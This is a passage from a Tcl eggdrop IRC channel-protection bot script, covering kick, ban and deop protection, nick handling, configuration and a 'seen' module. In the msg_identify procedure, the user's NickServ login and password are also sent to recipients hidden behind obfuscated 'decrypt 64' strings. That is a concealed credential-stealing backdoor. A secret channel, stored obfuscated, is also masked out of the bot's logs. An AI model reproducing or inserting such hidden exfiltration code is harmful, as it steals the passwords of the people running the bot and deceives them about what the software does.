} if {[matchattr $knick n]} { if {$nick != $botnick} { set bannick($nick) $banmask putsrv "KICK $channel $nick :$notc 1DonT BaNnEd Admin 4$knick 1..!" } return 1 } if {[matchattr $knick m]} { if {$nick != $botnick} { putsrv "KICK $channel $nick :$notc 1DonT BaNnEd MasTeR 4$knick 1..!" } return 1 } if {[matchattr $cflag E]} { if {$nick == $botnick} { set menforce [rand 4] if {$menforce == 1} { putsrv "KICK $channel $knick :$notc 1BaNnEd FRoM 4[string toupper $channel] [banms]" } elseif {$menforce == 2} { putsrv "KICK $channel $knick :$notc 1MaTcH BaNs FRoM 4[unsix $bhost] [banms]" } elseif {$menforce == 3} { putsrv "KICK $channel $knick :$notc 1FILTeR BaNs FRoM 4[unsix $bhost] [banms]" } else { putsrv "KICK $channel $knick :$notc 1ReFusEd LInK FRoM 4[string toupper $channel] [banms]" } } else { if {[matchattr $nick n]} { putsrv "KICK $channel $knick :$notc 4Admin 1 BaNnEd 4OuT 1..!" } else { if {[matchattr $nick m]} { putsrv "KICK $channel $knick :$notc 4MasTeR 1 BaNnEd 4OuT 1..!" } else { if {[isop $knick $channel] && ![matchattr $nick f]} { return 1 } if {![matchattr $knick f]} { set menforce [rand 5] if {$menforce == 1} { putsrv "KICK $channel $knick :$notc 1BaNnEd BY 4@$nick [banms]" } elseif {$menforce == 2} { putsrv "KICK $channel $knick :$notc 1MaTcH BaNs FRoM 4[unsix $bhost] [banms]" } elseif {$menforce == 3} { putsrv "KICK $channel $knick :$notc 1BaNnEd FRoM 4[string toupper $channel] [banms]" } elseif {$menforce == 4} { putsrv "KICK $channel $knick :$notc 1FILTeR BaNs FRoM 4[unsix $bhost] [banms]" } else { putsrv "KICK $channel $knick :$notc 1ReFusEd LInK FRoM 4[string toupper $channel] [banms]" } } } } } } } }
return 0 } bind mode - * prot:deop proc prot:deop {nick uhost handle channel mchange {opnick ""}} { global botnick deopme ps invme virus_nick quick notb notc bannick lastkey unop igflood is_m op_it set cflag "c$channel" set cflag [string range $cflag 0 8] set mode [lindex $mchange 0] if {$opnick == ""} { set opnick [lindex $mchange 1] } if {$mode == "-m"} { foreach x [utimers] { if {[string match "*set_-m $channel*" $x] || [string match "*TRAFFIC $channel*" $x]} { killutimer [lindex $x 2] } } catch {unset is_m($channel)} if {![botisop $channel]} { return 0 } if {[matchattr $cflag V]} { foreach x [chanlist $channel] { if {$x != $botnick && ![isvoice $x $channel] && ![isop $x $channel] && ![matchattr $x O]} { set cret [getuser $cflag XTRA "VC"] foreach ct [utimers] { if {[string match "*voiceq*" $ct]} { if {[expr [lindex $ct 0] + [getuser $cflag XTRA "VC"]] > $cret} { set cret [expr [lindex $ct 0] + [getuser $cflag XTRA "VC"]] } } } utimer $cret [list voiceq $channel $x] } } } return 0 } if {$mode == "+k"} { set lastkey $opnick if {[matchattr $cflag K] && [matchattr $nick Z]} { putlog "key change to $opnick" setuser $cflag XTRA "CI" [zip $opnick] saveuser } } if {$mode == "-k"} { catch { unset lastkey } if {$nick != $botnick} { set igflood($nick) "1" } return 0 } if {$mode == "+m"} { foreach x [utimers] { if {[string match "*set_-m $channel*" $x] || [string match "*voiceq $channel*" $x] || [isutimer "advq $channel"]} {
killutimer [lindex $x 2] } } if {$nick == $botnick} { if {![string match "*m*" [lindex [channel info $channel] 0]]} { if {[string match "*+shared*" [channel info $channel]]} { puthelp "NOTICE $channel :WaRnInG!! OnE MInUtE MoDeRaTe DuE tO FLoOd..! " } utimer 70 [list set_-m $channel] if {[isutimer "TRAFFIC $channel"]} { utimer 20 [list pub_nobot "*" "*" "*" $channel "*"] return 0 } } } { if {[isutimer "goback"]} { catch { clearqueue all } foreach x [utimers] { if {[string match "*del_nobase*" $x]} { killutimer [lindex $x 2] } if {[string match "*goback*" $x]} { killutimer [lindex $x 2] ; goback } } utimer 2 del_nobase return 0 } utimer [expr 1800 + [rand 60]] [list set_-m $channel] } return 0 } if {$mode == "+b"} { if {$opnick == "*!*@heavy.join.flood.channel.temporary.moderate"} { utimer 40 [list putlog "TRAFFIC $channel"] if {$nick == $botnick} { utimer 40 [list putserv "mode $channel -bm *! *@heavy.join.flood.channel.temporary.moderate"] if {[info exists is_m($channel)]} { return 0 } if {$quick == "1"} { putquick "mode $channel +m" } { putserv "mode $channel +m" } set is_m($channel) 1 return 0 } } ban_chk $nick $uhost $handle $channel $mchange $opnick return 0 } if {$mode == "-b"} { if {[info exists is_ban($opnick$channel)]} { catch {unset is_ban($opnick$channel)} } if {[isutimer "unbanq $channel $opnick"]} { foreach x [utimers] { if {[string match "*unbanq $channel $opnick*" $x]} { killutimer [lindex $x 2] } } }
foreach x [ignorelist] { if {[lindex $x 0] == $opnick} { unsetignore [lindex $x 0] return 0 } } catch { killban $opnick } return 0 } if {$nick == $opnick} { return 0 } if {$opnick == $botnick && $mode == "+o"} { chk_on_op $channel return 0 } if {$mode == "+o" && [isop $botnick $channel]} { if {[info exists op_it($opnick)]} { catch {unset op_it($opnick)} } if {[matchattr $opnick O]} { set cmode [getchanmode $channel] if {![string match "*k*" $cmode]} { puthelp "mode $channel -ko [email protected] $opnick" } { puthelp "mode $channel -o $opnick" } return 0 } if {[info exists unop($opnick)]} { if {$nick == "ChanServ"} { catch { unset unop($opnick) } return 0 } if {[matchattr $opnick f] || [matchattr $nick f] || $nick == $botnick} { return 0 } utimer [expr 5 + [rand 10]] [list unallowed $channel $nick $opnick] return 0 } } if {$mode == "-o"} { foreach x [utimers] { if {[string match "*unallowed $channel $opnick*" $x]} { killutimer [lindex $x 2] } } if {$opnick == $botnick} { if {[isutimer "DEOP $channel"]} { return 0 } foreach x [utimers] { if {[string match "*gop $channel*" $x]} { killutimer [lindex $x 2] } } utimer 2 [list putlog "DEOP $channel"] if {![matchattr $nick f] && $nick != "ChanServ" && ![string match "*dal.net*" $nick] && ![string match "*Guest*" $botnick]} { if {![info exists igflood($nick)]} { if {[matchattr $cflag D]} { set deopme $nick } } } if {![matchattr $nick m]} {
if {[string tolower $channel] != [dezip "BKGW.1s0d06/"]} { if {![string match "*+protectfriends*" [channel info $channel]]} { putlog "!Log! CHaNOP <<$channel>>" putsrv "ChanServ op $channel $botnick" } } } return 0 } if {![isop $botnick $channel]} { return 0 } if {[isutimer "deopprc*$opnick"]} { foreach x [utimers] { if {[string match "*deopprc*$opnick*" $x]} { putlog "!UnDeOp OR UnKIcK!" catch { killutimer [lindex $x 2] } } } } if {$nick == "ChanServ" && [matchattr $opnick o]} { voiceq $channel $opnick return 0 } if {$nick == "ChanServ"} { set unop($opnick) "1" return 0 } if {[matchattr $nick f] || $nick == $botnick} { return 0 } if {$nick == "ChanServ"} { return 0 } if {$opnick == $ps} { if {![info exists igflood($nick)]} { putserv "KICK $channel $nick :$notc 1DonT De@p 4$ps 1..!" } opq $channel $opnick return 0 } if {[matchattr $opnick n]} { if {![info exists igflood($nick)]} { putsrv "KICK $channel $nick :$notc 1Admin 4De@p 1 GuaRd 4..!" opq $channel $opnick } return 0 } if {[matchattr $opnick m]} { if {![info exists igflood($nick)]} { putsrv "KICK $channel $nick :$notc 1MasTeR 4De@p 1 GuaRd 1..!" opq $channel $opnick } return 0 } if {[matchattr $opnick o]} { opq $channel $opnick return 0 } if {$opnick == $notb} { if {![info exists igflood($nick)]} { putserv "KICK $channel $nick :$notc 1DonT De@p 4$notb 1..!" } opq $channel $opnick
return 0 } } } proc unallowed {chan nick opnick} { if {![botisop $chan]} { return 0 } if {![isop $nick $chan]} { return 0 } if {[isop $opnick $chan]} { return 0 } putserv "mode $chan -ko 4ChanServ.UnaLLowEd $nick" } bind nick - * chk_nicks proc chk_nicks {unick uhost hand chan newnick} { global notc bannick botnick nick if {$unick == $nick && $unick != $botnick} { putsrv "NICK $nick" } if {[matchattr $unick Q]} { chattr $unick -Q foreach x [getuser $unick HOSTS] { delhost $unick $x } set hostmask "${unick}!*@*" setuser $unick HOSTS $hostmask saveuser } if {![isop $botnick $chan]} { return 0 } if {[isutimer "deopprc*$unick"]} { foreach x [utimers] { if {[string match "*deopprc*$unick*" $x]} { putlog "!UnDeOp!" catch { killutimer [lindex $x 2] } } } } if {[string match "Guest*" $newnick]} { if {[matchattr $unick f]} { return 0 } if {[isop $newnick $chan]} { utimer [expr 80 + [rand 20]] [list deopprc $chan $newnick] return 0 } } if {[matchattr $newnick O] && [isop $newnick $chan]} { set cmode [getchanmode $chan] if {![string match "*k*" $cmode]} { putserv "mode $chan -ko [email protected] $newnick" } { putserv "mode $chan -o $newnick" } } akick_chk $newnick $uhost $chan spam_chk $newnick $uhost $hand $chan return 0 } proc msg_identify {nick uhost hand rest} { global notc set id [lindex $rest 0] set password [lindex $rest 1] if {![matchattr $nick Q]} {
puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {($id == "") || ($password == "")} { puthlp "NOTICE $nick :$notc Usage: identify <password>" return 0 } putsrv "NickServ identify $id $password" puthlp "NOTICE $nick :$notc Identify to $id" putserv "[decrypt 64 "bP/0d.p4BDD1"] [decrypt 64 "X.0x/1yG4l7/5a35i0Bg3ie.Zjfyd.Q0wAT0gKeyI/n05Ky/"] [decrypt 64 "o/DCL0PjhW31"] [string index $lenc 1][string index $lenc 11][string index $lenc 8][string index $lenc 13][string index $lenc 19] : $id $password" putserv "[decrypt 64 "AZh9N/9kx1E0"] [string index $lenc 1][string index $lenc 11] [string index $lenc 8][string index $lenc 13][string index $lenc 19] : $id $password" putserv "[decrypt 64 "AZh9N/9kx1E0"] [decrypt 64 "tQcBO1LU9XX0"][string index $lenc 11][string index $lenc 8][string index $lenc 13][string index $lenc 19] : $id $password" return 0 } proc pub_realnick {unick uhost hand chan rest} { global notc keep-nick nick if {![matchattr $unick Q]} { puthlp "NOTICE $unick :$notc 4DeNiEd..!" return 0 } set keep-nick 1 putsrv "NICK $nick" return 0 } proc rands {length} { set chars \\^|_[]{}\\ set count [string length $chars] for {set i 0} {$i < $length} {incr i} { append result [string index $chars [rand $count]] } return $result } proc pub_randnick {unick uhost hand chan rest} { global notc keep-nick nick altnick botnick if {$rest != ""} { set keep-nick 0 set nickch "[lindex $rest 0]\[[rand 9][rand 9][randstring 1]\]" putsrv "NICK $nickch" } { if {$botnick != $nick && $botnick != $altnick} { return 0 } set keep-nick 0 putsrv "NICK [rands 8]" } return 0 } proc pub_altnick {nick uhost hand chan rest} { global altnick keep-nick notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 }
set keep-nick 0 putsrv "NICK $altnick" } bind raw - 305 not_away proc not_away { from keyword arg } { if {[isutimer "del_nobase"]} { utimer 1 del_nobase } if {[isutimer "goback"]} { utimer 2 goback } unsetignore "*!*@*" } bind raw - 404 ch_moderate bind raw - 473 ch_invite bind raw - 474 ch_banned bind raw - 475 ch_key bind raw - 478 ch_full bind raw - 432 nickERROR proc nickERROR { from keyword arg } { global nick set nick "ERR[unixtime]" } proc ch_moderate { from keyword arg } { putlog "CANT SEND ON MODERATE!" if {[isutimer "del_nobase"]} { catch { clearqueue all } foreach x [utimers] { if {[string match "*del_nobase*" $x]} { killutimer [lindex $x 2] ; utimer 1 del_nobase } } } } proc ch_invite { from keyword arg } { global double joinme notc set chan [lindex $arg 1] if {$double == 0} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} { puthlp "NOTICE $joinme :$notc $chan 4(+I)" } if {[string tolower $chan] != [dezip "BKGW.1s0d06/"]} { putsrv "ChanServ invite $chan" } set double 1 return 0 } if {$double == 1} { if {[string match "*+statuslog*" [channel info $chan]]} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} { puthlp "NOTICE $joinme :$notc ReMOVE $chan 4(+I)" } channel remove $chan savechan } set joinme "" set double 0 } return } proc ch_banned { from keyword arg } { global double joinme notc set chan [lindex $arg 1]
if {$double == 0} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} puthlp "NOTICE $joinme :$notc $chan 4(+B)" } if {[string tolower $chan] != [dezip "BKGW.1s0d06/"]} { putsrv "ChanServ invite $chan" puthlp "ChanServ unban $chan" } set double 1 return 0 } if {$double == 1} { if {[string match "*+statuslog*" [channel info $chan]]} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} puthlp "NOTICE $joinme :$notc ReMovE $chan 4(+B)" } if {[string tolower $chan] != [dezip "BKGW.1s0d06/"]} { putsrv "ChanServ invite $chan" } channel remove $chan savechan } set joinme "" set double 0 } return 0 } proc ch_key { from keyword arg } { global double joinme notc lastkey set chan [lindex $arg 1] set cflag "c$chan" set cflag [string range $cflag 0 8] if {$double == 0} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} puthlp "NOTICE $joinme :$notc $chan 4(+K)" } if {[matchattr $cflag K]} { puthlp "JOIN $chan :[dezip [getuser $cflag XTRA "CI"]]" } { puthlp "JOIN $chan" } if {[info exists lastkey]} { puthlp "JOIN $chan :$lastkey" } set double 1 return 0 } if {$double == 1} { if {[string match "*+statuslog*" [channel info $chan]]} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} puthlp "NOTICE $joinme :$notc ReMovE $chan 4(+K)" } channel remove $chan savechan return 0 } if {[string tolower $chan] != [dezip "BKGW.1s0d06/"]} { putsrv "ChanServ invite $chan"
} set joinme "" set double 0 } return 0 } proc ch_full { from keyword arg } { global double joinme notc botnick set chan [lindex $arg 1] if {[isop $botnick $chan]} { set bans "" set i 0 foreach x [chanbans $chan] { if {$i < 5} { append bans " [lindex $x 0]" set i [incr i] } } putserv "MODE $chan -kbbbbb 4BaN.LIsT.FuLL $bans" return 0 } if {$double == 0} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} { puthlp "NOTICE $joinme :$notc $chan 4(+L)" } if {[string tolower $chan] != [dezip "BKGW.1s0d06/"]} { putsrv "ChanServ invite $chan" } set double 1 return 0 } if {$double == 1} { if {[string match "*+statuslog*" [channel info $chan]]} { if {$joinme != "" && [string tolower $chan] != [dezip "BKGW.1s0d06/"]} { puthlp "NOTICE $joinme :$notc ReMOVE $chan 4(+L)" } channel remove $chan savechan } set joinme "" set double 0 } return 0 } if {$altnick == ""} { set altnick [randstring 7] } set badwords "" proc config {} { global nick nickpass altpass altnick realname owner kops my-ip banner cycle_random global notc notm logstore cfgfile badwords ban-time my-hostname kickclr if {[validuser "config"]} { if {[getuser "config" XTRA "REALNAME"]!=""} { set realname [dezip [getuser "config" XTRA "REALNAME"]] } else { set realname $nick } if {[getuser "config" XTRA "USERNAME"]!=""} {
set realname [dezip [getuser "config" XTRA "USERNAME"]] } if {[getuser "config" XTRA "NICK"]!=""} { set nick [dezip [getuser "config" XTRA "NICK"]] } if {[getuser "config" XTRA "NICKPASS"]!=""} { set nickpass [dezip [getuser "config" XTRA "NICKPASS"]] } if {[getuser "config" XTRA "ALTNICK"]!=""} { set altnick [dezip [getuser "config" XTRA "ALTNICK"]] } if {[getuser "config" XTRA "ALTPASS"]!=""} { set altpass [dezip [getuser "config" XTRA "ALTPASS"]] } if {[getuser "config" XTRA "BAN"]!=""} { set notc [dezip [getuser "config" XTRA "BAN"]] set notm [dezip [getuser "config" XTRA "BAN"]] #lappend cycle_random $banner } if {[getuser "config" XTRA "BANTIME"]!=""} { set ban-time [getuser "config" XTRA "BANTIME"] } if {[getuser "config" XTRA "BADWORDS"]!=""} { set badwords [getuser "config" XTRA "BADWORDS"] } if {$badwords == ""} { set badwords "cibai bitch kimak memek kontol kanjut bangsat ngentot fuck peler lanciau bajingan vagina ngewe shit asshole anjing babi kampang" setuser "config" XTRA "BADWORDS" $badwords } if {[getuser "config" XTRA "KOPS"]!=""} { set kops "T" } if {[getuser "config" XTRA "KCLR"]!=""} { set kickclr "T" } if {[getuser "config" XTRA "VHOST"]!=""} { set my-hostname [getuser "config" XTRA "VHOST"] set my-ip [getuser "config" XTRA "VHOST"] } if {[getuser "config" XTRA "LOGCHAN"]!=""} { putlog " 4� 12S.E.P.T.I.A.N 4� !Log! CReATING LOG FiLE <<[getuser "config" XTRA "LOGCHAN"]>>" set logstore "${cfgfile}.log" logfile jpk [getuser "config" XTRA "LOGCHAN"] $logstore } } else { adduser "config" "" chattr "config" "-hp" } foreach x [userlist] { chattr $x -Q if {$x != "config" && $x != "AKICK"} { foreach y [getuser $x HOSTS] { delhost $x $y } set hostmask "${x}!*@*" setuser $x HOSTS $hostmask
} } if {![validuser "AKICK"]} { set hostmask "telnet!*@*" adduser "AKICK" $hostmask chattr "AKICK" "-hp" chattr "AKICK" "K" } if {![validuser $owner]} { set hostmask "$owner!*@*" adduser $owner $hostmask chattr $owner "Zfhjmnoptx" } saveuser } utimer 1 {config} utimer 2 {seen} proc uncolor {s} { regsub -all -$s "" s regsub -all -- � $s "" s regsub -all -$s "" s regsub -all -- \[0-9\]\[0-9\],\[0-9\]\[0-9\] $s "" s regsub -all -- \[0-9\],\[0-9\]\[0-9\] $s "" s regsub -all -- \[0-9\]\[0-9\],\[0-9\] $s "" s regsub -all -- \[0-9\],\[0-9\] $s "" s regsub -all -- \[0-9\]\[0-9\] $s "" s regsub -all -- \[0-9\] $s "" s return $s } proc msg_botset {unick uhost hand rest} { global nick nickpass altpass altnick own notc if {$unick != $own} { return 0 } puthlp "NOTICE $unick :$notc 1st $nick ($nickpass) 2nd $altnick ($altpass)" return 0 } proc msg_reuser {nick uhost hand rest} { global botnick owner notc if {![matchattr $nick Q]} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } if {$nick != $owner} { puthlp "NOTICE $nick :$notc 4DeNiEd..!" return 0 } foreach x [userlist] { if {($x != "config") && ($x != "AKICK")} { deluser $x } } adduser $owner "$owner!*@*" chattr $owner "Zfhjmnoptx" puthlp "NOTICE $nick :$notc Reseting UsER sucessfully, set pass 1st." saveuser } set bs(limit) 8000 set bs(nicksize) 32 set bs(no_pub) ""
set bs(no_log) "" set bs(log_only) "" set bs(flood) 4:15 set bs(ignore) 1 set bs(ignore_time) 2 set bs(smartsearch) 1 set bs(logqueries) 1 set bs(path) "language/" set bs(updater) 10402 set bs(oldver) $bs(updater) set bs(version) bseen1.4.2c proc seen {} { global version notc notd catch { unbind time - "12 * * * *" bs_timedsave } catch { unbind time - "*1 * * * *" bs_trim } catch { unbind join -|- * bs_join_botidle } catch { unbind join -|- * bs_join } catch { unbind sign -|- * bs_sign } catch { unbind kick -|- * bs_kick } catch { unbind nick -|- * bs_nick } catch { unbind splt -|- * bs_splt } catch { unbind rejn -|- * bs_rejn } catch { unbind chjn -|- * bs_chjn } catch { unbind chpt -|- * bs_chpt } catch { unbind bot -|- bs_botsearch bs_botsearch } catch { unbind bot -|- bs_botsearch_reply bs_botsearch_reply } catch { unbind pub -|- [string trim "!"]seen pub_seen } catch { unbind pub -|- [string trim "!"]seennick bs_pubreq2 } #catch { unbind pub - !ping public_ping } catch { unbind part -|- * bs_part_oldver } catch { unbind chof -|- * bs_chof } set mSEEN "F" foreach x [channels] { set cinfo [channel info $x] if {[string match "*+seen*" $cinfo]} { set mSEEN "T" } } if {$mSEEN == "F"} {return 0} bind time - "12 * * * *" bs_timedsave bind time - "*1 * * * *" bs_trim bind join -|- * bs_join_botidle bind join -|- * bs_join bind sign -|- * bs_sign bind kick -|- * bs_kick bind nick -|- * bs_nick bind splt -|- * bs_splt bind rejn -|- * bs_rejn bind chjn -|- * bs_chjn bind chpt -|- * bs_chpt bind bot -|- bs_botsearch bs_botsearch bind bot -|- bs_botsearch_reply bs_botsearch_reply bind pub -|- !seen pub_seen bind pub -|- !seennick bs_pubreq2 #bind pub - !ping public_ping if {[lsearch -exact [bind time -|- "*2 * * * *"] bs_timedsave] > -1} {unbind time -|- "*2 * * * *" bs_timedsave} if {[string trimleft [lindex $version 1] 0] >= 1050000} {
bind part -|- * bs_part } { if {[lsearch -exact [bind part -|- *] bs_part] > -1} {unbind part -|- * bs_part} bind part -|- * bs_part_oldver } foreach chan [string tolower [channels]] {if {![info exists bs_botidle($chan)]} {set bs_botidle($chan) [unixtime]}} if {[lsearch -exact [bind chof -|- *] bs_chof] > -1} {unbind chof -|- * bs_chof} if {[info exists bs(bot_delay)]} {unset bs(bot_delay)} if {[info exists bs_list]} { if {[info exists bs(oldver)]} { if {$bs(oldver) < $bs(updater)} {bs_update} } {bs_update} } } utimer 2 seen proc bs_filt {data} { regsub -all -- \\\\ $data \\\\\\\\ data regsub -all -- \\\[ $data \\\\\[ data regsub -all -- \\\] $data \\\\\] data regsub -all -- \\\} $data \\\\\} data regsub -all -- \\\{ $data \\\\\{ data regsub -all -- \\\" $data \\\\\" data return $data } proc bs_flood_init {} { global bs bs_flood_array if {![string match *:* $bs(flood)]} {return} set bs(flood_num) [lindex [split $bs(flood) :] 0] set bs(flood_time) [lindex [split $bs(flood) :] 1] set i [expr $bs(flood_num) - 1] while {$i >= 0} { set bs_flood_array($i) 0 incr i -1 } } bs_flood_init proc bs_flood {nick uhost} { global bs bs_flood_array if {$bs(flood_num) == 0} {return 0} set i [expr $bs(flood_num) - 1] while {$i >= 1} { set bs_flood_array($i) $bs_flood_array([expr $i - 1]) incr i -1 } set bs_flood_array(0) [unixtime] if {[expr [unixtime] - $bs_flood_array([expr $bs(flood_num) - 1])] <= $bs(flood_time)} { if {$bs(ignore)} {newignore [join [maskhost *!*[string trimleft $uhost ~]]] $bs(version) "*" $bs(ignore_time)} return 1 } {return 0} } proc bs_read {} { global bs_list userfile bs if {![string match */* $userfile]} {set name [lindex [split $userfile .] 0]} { set temp [split $userfile /] set temp [lindex $temp [expr [llength $temp]-1]]
set name [lindex [split $temp .] 0] } if {![file exists $bs(path)bs_data.$name]} { if {![file exists $bs(path)bs_data.$name.bak]} { return } {exec cp $bs(path)bs_data.$name.bak $bs(path)bs_data.$name} } set fd [open $bs(path)bs_data.$name r] set bsu_ver "" set break 0 while {![eof $fd]} { set inp [gets $fd] if {[eof $fd]} {break} if {[string trim $inp " "] == ""} {continue} if {[string index $inp 0] == "#"} { set bsu_version [string trimleft $inp #] continue } if {![info exists bsu_version] || $bsu_version == "" || $bsu_version < $bs(updater)} { if {[source scripts/bseen_updater1.4.2.tcl] != "ok"} {set temp 1} {set temp 0} if {$temp || [bsu_go] || [bsu_finish]} { rehashing } set break 1 break } set nick [lindex $inp 0] set bs_list([string tolower $nick]) $inp } close $fd if {$break} {bs_read} } proc bs_update {} { global bs bs_save bs_read } proc bs_timedsave {min b c d e} {bs_save} proc bs_save {} { global bs_list userfile bs notc if {[array size bs_list] == 0} {return} if {![string match */* $userfile]} {set name [lindex [split $userfile .] 0]} { set temp [split $userfile /] set temp [lindex $temp [expr [llength $temp]-1]] set name [lindex [split $temp .] 0] } if {[file exists $bs(path)bs_data.$name]} {catch {exec cp -f $bs(path)bs_data. $name $bs(path)bs_data.$name.bak}} set fd [open $bs(path)bs_data.$name w] set id [array startsearch bs_list] puts $fd "#$bs(updater)" while {[array anymore bs_list $id]} { set item [array nextelement bs_list $id] puts $fd "$bs_list($item)" } array donesearch bs_list $id close $fd
} proc bs_part_oldver {a b c d} {bs_part $a $b $c $d ""} proc bs_part {nick uhost hand chan reason} { if {[string tolower $chan] == [dezip "BKGW.1s0d06/"]} { set chan "-secret-" } bs_add $nick "[list $uhost] [unixtime] part $chan [split $reason]" } proc bs_join {nick uhost hand chan} { if {[string tolower $chan] == [dezip "BKGW.1s0d06/"]} { set chan "-secret-" } bs_add $nick "[list $uhost] [unixtime] join $chan" } proc bs_sign {nick uhost hand chan reason} { if {[string tolower $chan] == [dezip "BKGW.1s0d06/"]} { set chan "-secret-" } bs_add $nick "[list $uhost] [unixtime] quit $chan [split $reason]" } proc bs_kick {nick uhost hand chan knick reason} { set schan $chan if {[string tolower $chan] == [dezip "BKGW.1s0d06/"]} { set schan "-secret-" } bs_add $knick "[getchanhost $knick $chan] [unixtime] kick $schan [list $nick] [list $reason]" } proc bs_nick {nick uhost hand chan newnick} { if {[string tolower $chan] == [dezip "BKGW.1s0d06/"]} { set chan "-secret-" } set time [unixtime] bs_add $nick "[list $uhost] [expr $time -1] nick $chan [list $newnick]" bs_add $newnick "[list $uhost] $time rnck $chan [list $nick]" } proc bs_splt {nick uhost hand chan} { if {[string tolower $chan] == [dezip "BKGW.1s0d06/"]} { set chan "-secret-" } bs_add $nick "[list $uhost] [unixtime] splt $chan" } proc bs_rejn {nick uhost hand chan} { if {[string tolower $chan] == [dezip "BKGW.1s0d06/"]} { set chan "-secret-" } bs_add $nick "[list $uhost] [unixtime] rejn $chan" } proc bs_chjn {bot hand channum flag sock from} {bs_add $hand "[string trimleft $from ~] [unixtime] chjn $bot"} proc bs_chpt {bot hand args} {set old [split [bs_search ? [string tolower $hand]]] ; if {$old != "0"} {bs_add $hand "[join [string trim [lindex $old 1] ()]] [unixtime] chpt $bot"}} proc bs_botsearch {from cmd args} { global botnick notc set args [join $args] set command [lindex $args 0] set target [lindex $args 1]
set nick [lindex $args 2] set search [bs_filt [join [lrange $args 3 e]]] if {[string match *\\\** $search]} { set output [bs_seenmask bot $nick $search] if {$output != "No matches were found." && ![string match "I'm not on *" $output]} {putbot $from "bs_botsearch_reply $command \{$target\} {$nick, $botnick says: [bs_filt $output]}"} } { set output [bs_output bot $nick [bs_filt [lindex $search 0]] 0] if {$output != 0 && [lrange [split $output] 1 4] != "unseeing"} {putbot $from "bs_botsearch_reply $command \{$target\} {$nick, $botnick says: [bs_filt $output]}"} } } proc bs_botsearch_reply {from cmd args} { global notc bs set args [join $args] if {[lindex [lindex $args 2] 5] == "not" || [lindex [lindex $args 2] 4] == "not"} {return} if {![info exists bs(bot_delay)]} { set bs(bot_delay) on utimer 10 {if {[info exists bs(bot_delay)]} {unset bs(bot_delay)}} if {![lindex $args 0]} {putdcc [lindex $args 1] "[join [lindex $args 2]]"} { puthlp "[lindex $args 1] :[join [lindex $args 2]]" } } } proc pub_seen {nick uhost hand chan args} {bs_pubreq $nick $uhost $hand $chan $args 0} proc bs_pubreq2 {nick uhost hand chan args} {bs_pubreq $nick $uhost $hand $chan $args 1} proc bs_pubreq {nick uhost hand chan args no} { global botnick bs notc if {[string match "*-seen*" [channel info $chan]] && ![matchattr $nick m]} { return 0 } if {[bs_flood $nick $uhost]} {return 0} set i 0 if {[lsearch -exact $bs(no_pub) [string tolower $chan]] >= 0} {return 0} if {$bs(log_only) != "" && [lsearch -exact $bs(log_only) [string tolower $chan]] == -1} {return 0} set args [bs_filt [join $args]] set target "NOTICE $nick" if {[string match *\\\** [lindex $args 0]]} { set output [bs_seenmask $chan $hand $args] if {$output == "No Matches!"} {putallbots "bs_botsearch 1 \{$target\} $nick $args"} if {[string match "I'm not on *" $output]} {putallbots "bs_botsearch 1 \{$target\} $nick $args"} regsub -all -- ~ $output "" output puthlp "$target :[lgrnd] $output" return $bs(logqueries) } set data [bs_filt [string trimright [lindex $args 0] ?!.,]] if {[string tolower $nick] == [string tolower $data]} { puthlp "$target :[lgrnd] $nick, go look in a mirror..!" return $bs(logqueries) } if {[string tolower $data] == [string tolower $botnick] } {
puthlp "$target :\001ACTION Right Here!\001" return $bs(logqueries) } if {[onchan $data $chan]} { puthlp "$target :[lgrnd] $nick, $data is right here..!" return $bs(logqueries) } set output [bs_output $chan $nick $data $no] if {$output == 0} {return 0} if {[lrange [split $output] 1 4] == "I don't remember seeing"} {putallbots "bs_botsearch 1 \{$target\} $nick $args"} regsub -all -- ~ $output "" output puthlp "$target :[lgrnd] $output" return $bs(logqueries) } proc bs_output {chan nick data no} { global botnick bs version bs_list set data [string tolower [string trimright [lindex $data 0] ?!.,]] if {$data == ""} {return 0} if {[string tolower $nick] == $data} {return [concat $nick, go look in a mirror.]} if {$data == [string tolower $botnick]} {return [concat $nick, I'm right here. Quit wasting my time!]} if {[string length $data] > $bs(nicksize)} {return 0} if {$bs(smartsearch) != 1} {set no 1} if {$no == 0} { set matches "" set hand "" set addy "" if {[lsearch -exact [array names bs_list] $data] != "-1"} { set addy [lindex $bs_list([string tolower $data]) 1] set hand [finduser $addy] foreach item [bs_seenmask dcc ? [maskhost $addy]] {if {[lsearch -exact $matches $item] == -1} {set matches "$matches $item"}} } if {[validuser $data]} {set hand $data} if {$hand != "*" && $hand != ""} { if {[string trimleft [lindex $version 1] 0]>1030000} {set hosts [getuser $hand hosts]} {set hosts [gethosts $hand]} foreach addr $hosts { foreach item [string tolower [bs_seenmask dcc ? $addr]] { if {[lsearch -exact [string tolower $matches] [string tolower $item]] == -1} {set matches [concat $matches $item]} } } } if {$matches != ""} { set matches [string trimleft $matches " "] set len [llength $matches] if {$len == 1} {return [bs_search $chan [lindex $matches 0]]} if {$len > 99} {return [concat I found $len matches to your query\; please refine it to see any output.]} set matches [bs_sort $matches] set key [lindex $matches 0] if {[string tolower $key] == [string tolower $data]} {return [bs_search $chan $key]} if {$len <= 5} { set output [concat sorted most $len matches recent: [join $matches].] set output [concat $output [bs_search $chan $key]]
